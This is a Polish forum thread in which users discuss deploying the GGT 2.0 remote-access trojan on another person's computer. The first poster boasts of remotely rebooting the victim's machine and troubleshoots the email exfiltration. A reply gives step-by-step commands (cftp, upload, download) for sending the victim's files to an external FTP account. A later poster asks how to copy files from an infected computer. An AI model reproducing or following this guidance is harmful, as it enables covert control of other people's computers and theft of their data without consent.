GGT 2.0 offline i problemy z mailem

Piąstka

Użytkownik
Dołączył
Wrzesień 16, 2004
Posty
3
Podrzuciłem gostkowi serwer GGT 2.0 zauważyłem bardzo ciekawą właściwość, ON DZIAŁA OFFLINE
smile.gif
tzn. jeśli serwer jest niedostępny i wyślę mu kilka poleceń od razu po uruchomieniu się serwera wykonuje te polecenia samoczynnie bez ingerencji z mojej strony.
Większość funkcji działa ok najbardziej podoba mi się reboot
smile.gif
Niestety użytkownik jest za natem nie mogę sprawdzić FTP.
Poza tym GGT nie chce mi nic wysłać na email. Email skonfigurowałem według instrukcji krok po kroku na serwerze O2. Co może być powodem że nie chce wysyłać email ?? Czy serwer o2 czy może nat ?? czy może mają to że mają swój własny serwer email ??
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
jak nie dzała @ to uzyj klienta FTP, polecenie "cftp",
musisz mieć gdzies konto FTP założone ,np na republice. po wpisaniu komendy cftp ggt pyta o podanie adresu ftp i wtedy piszesz np. ftp.republika.pl i wysyłasz, nastepnie podajesz login, hasło, port 21. W okienku rozmowy zobaczysz listę plików jakie znajduja sie na FTPku, możesz władować jakis plik od ofiary na ten FTP, uzywajc komendy UPLOAD, np. "upload c:folderconfig.dat" , pliki z FTP mozesz tez ściagać komenda DOWNLOAD, kazdy plik na FTP ma swój numer i ściagasz tak "download x" gdzie x to numer pliku na liscie, plik zapisuje sie do folderu Windows , coff - rozłacza z serwerem FTP
 

jackasss

Użytkownik
Dołączył
Marzec 31, 2007
Posty
1
mam taki sam problem moze by ktos mogł krok po kroku ospisac jak sei pobiera pliki z dysku zainfekowanego komputera na czym to polega ia jak pozniej sobie to na dysk pzrezucic


byłbym wdzieczny z gory dziekuje za odpowiedz
 
Do góry Bottom